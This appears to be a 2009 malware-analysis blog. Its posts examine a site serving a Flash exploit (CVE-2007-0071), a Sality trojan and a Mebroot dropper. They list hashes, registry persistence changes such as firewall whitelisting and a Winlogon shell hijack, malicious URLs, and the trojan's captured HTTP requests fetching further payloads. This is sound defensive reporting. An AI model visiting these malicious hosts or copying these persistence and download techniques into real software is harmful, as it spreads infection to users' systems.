May 14, 2009

Malicious Site containing SWF:CVE-2007-0071

Malicious Site:http://jjxp22.cn/a/iqq.html
Someone submitted this malicious link "http://jjxp22.cn/a/iqq.html" to me . It seems to be a pop-up or hidden link from some compromised sites.

After checking on the Page Source, i found an obfuscated Javascript (Shown below).

Obfuscated JavaScript

I de-obfuscated the Javascript and found that it uses Deconcept's SWFObject to embed malicious Shockwave Flash that compromise the Integer overflow vulnerbility in Adobe Flash Player 9.0.115.0 and earlier (CVE-2007-0071), which allows remote attackers to execute arbitrary code.

The malicious Flash files (6 of them, shown in the script below) will exploit the Flash player and download malicious executable files into the victim's system from various websites.

De-obfuscated JavaScript

Sample Flash file info
###############

Filename: i16.swf
Size: 17897
MD5: 426969FD0D7324EE170D6F46BDB203B6
Virus Found: Bloodhound.Exploit.193 (Symantec)

On the VirusTotal website, 13 out of 39 AV detected it (Shown Below).

VirusTotal

From the "Who-is" record, the IP (61.164.108.35) belongs to RuiAn Telecom (China).

Who-is record

Posted by w01f at 1:48:00 PM 2 comments
Labels: ,

May 5, 2009

Malware analysis: Trojan W32/Sality

I have receive a suspcious file from my colleague this morning and done a simple behaviour analysis on it.

Analysis Report:
##############

Filename: ~.exe
MD5: 3A03A20BFEFE3FDD01659D47D2ED76C8
Virus Found: W32/Sality (McAfee), TROJ_DLOADER.XOP (TrendMicro), Mal/Generic-A (Sophos), Trojan-Downloader.Win32.Agent.brxr (Kaspersky,F-Secure),

On the VirusTotal website, 36 out of 40 AV detected it (details).



Registry values added:
================
1>
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

2> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Owner\Desktop\~.exe: "C:\Documents and Settings\Owner\Desktop\~.exe:*:Enabled:ipsec"

The above registry setting add the malware into the Windows firewall rules and name it as "ipsec" (shown above).

3>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\24: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

4>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xml\1: 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 00 00 4C 00 32 00 00 00 00 00 00 00 00 00 00 00 73 65 63 31 2E 78 6D 6C 2E 6C 6E 6B 00 00 30 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 73 00 65 00 63 00 31 00 2E 00 78 00 6D 00 6C 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 00 00

5>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\~.rkr: 08 00 00 00 06 00 00 00 80 F4 57 31 2D CD C9 01

6>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@C:\WINDOWS\system32\SHELL32.dll,-22913: "Shows the disk drives and hardware connected to this computer."

7>
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\~.exe: "~"

Registry values modified:
==================
1> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000010

2> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000011

3> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe"

4> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe "C:\Documents and Settings\Owner\Desktop\~.exe""

5> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000039

6> HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000003A

7> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000039

8> HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000003A

Files modifed:
==========
1> C:\Documents and Settings\Owner\Cookies\index.dat

2> C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat

3> C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat

4> C:\WINDOWS\system.ini

5> C:\WINDOWS\system32\config\software.LOG

6> C:\WINDOWS\system32\config\system.LOG

Other behaviours:
=============
System conecting to:
1> peskostruikaz.com:80
The following HTTP request found:
" GET /auq.php?8e54ce=1332546&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: peskostruikaz.com
Cache-Control: no-cache"

2> johnsonbodyshop.com:80
No request after initial handshake.

3> shopatforgetmenot.com:80
The following HTTP request found:
GET /images/mainlogo.gif?58fb0a=833062&id=2554099245826 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.57
Host: shopatforgetmenot.com
Cache-Control: no-cache"

4> corporateshelters.com:80
No request after initial handshake.

Seems like the malware trying to download more malicious payload from "peskostruikaz.com/auq.php" and "shopatforgetmenot.com/images/mainlogo.gif".

Posted by w01f at 12:52:00 PM 0 comments
Labels:

Apr 28, 2009

Malicious Website: u-toys.com

U-toys.com

This Website "www.u-toys.com" was forwarded to me by commandrine as an suspicious website. While accessing the website, there seems to be a JavaScript running. By checking on the page source (HTML code), there is a obfuscated JavaScript (shown below). It seems to be created by some JavaScript Obfuscator application that i am not able to de-obfuscated.

Obfuscated Javascript

After doing some behaviour analysis on the Javascript, it seems to be exploiting on some Internet browser vulnerabilities. It manage to inject an executable files into the C:\ folder on older and unpatched browser. Newly patched browser do not seems to find any "injected" files. Below is the analysis on the executable file.

Analysis Report:
##############

Filename: b01kyk.exe
Size: 327680
MD5: 615A8484F113DA99D2C172A44C9E7D31
Virus found: Trojan:W32/Mebroot.gen!A (F-Secure)

On the VirusTotal website, 11 out of 38 AV detected it (Shown below). Well-known AV not detected (Symantec, McAfee).

VirusTotal

Registry values added:
================
1> HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

2> HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 44 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 4F 77 6E 65 72 5C 44 65 73 6B 74 6F 70 5C 62 30 31 6B 79 6B 2E 65 78 65 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 4F 77 6E 65 72 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 45 2E 74 6D 70 00 00 5C 3F 3F 5C 63 3A 5C 64 6F 63 75 6D 65 7E 31 5C 6F 77 6E 65 72 5C 6C 6F 63 61 6C 73 7E 31 5C 74 65 6D 70 5C 65 2E 74 6D 70 00 00 5C 3F 3F 5C 43 3A 5C 57 49 4E 44 4F 57 53 5C 54 45 4D 50 5C 46 2E 74 6D 70 00 00 00

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\o01xlx.rkr: 0B 00 00 00 06 00 00 00 00 78 6B 45 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\b01kyk.exe: "b01kyk"

Registry values modified:
==================
1> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000B

2> HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000C

3> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 7F 00 00 00 70 D2 53 1A 46 D4 C9 01

4> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 0B 00 00 00 80 00 00 00 20 91 5F 45 46 D4 C9 01

5> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D3 00 00 00 20 5B 70 1A 46 D4 C9 01

6> HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0B 00 00 00 D4 00 00 00 00 78 6B 45 46 D4 C9 01

w01f advise: Always patched up your Internet browser and beware of suspicious scripts and pop-up running in the website.

Other reports on this site:
- Security Republic - Innocent???

Posted by w01f at 5:41:00 PM 0 comments
Labels: ,

Mar 27, 2009

Welcome

This site is created to provide a platform for anyone to share their ideas, experiences and findings on malware analysis. Feel free to comment or e-mail me any suspicious files.
Posted by w01f at 11:40:00 AM 0 comments
Labels:

Mar 22, 2009

Info on Conficker

Found some excellent read-ups on Conficker virus by the researchers at SRI International. It is one of the best analysis on the malware so far. You can find those reports from the link below.

- An Analysis of Conficker
- Addendum on Conficker C

There are others Malware information from the SRI Malware Threat Center.
Posted by w01f at 1:01:00 PM 0 comments
Labels:
Subscribe to: Comments (Atom)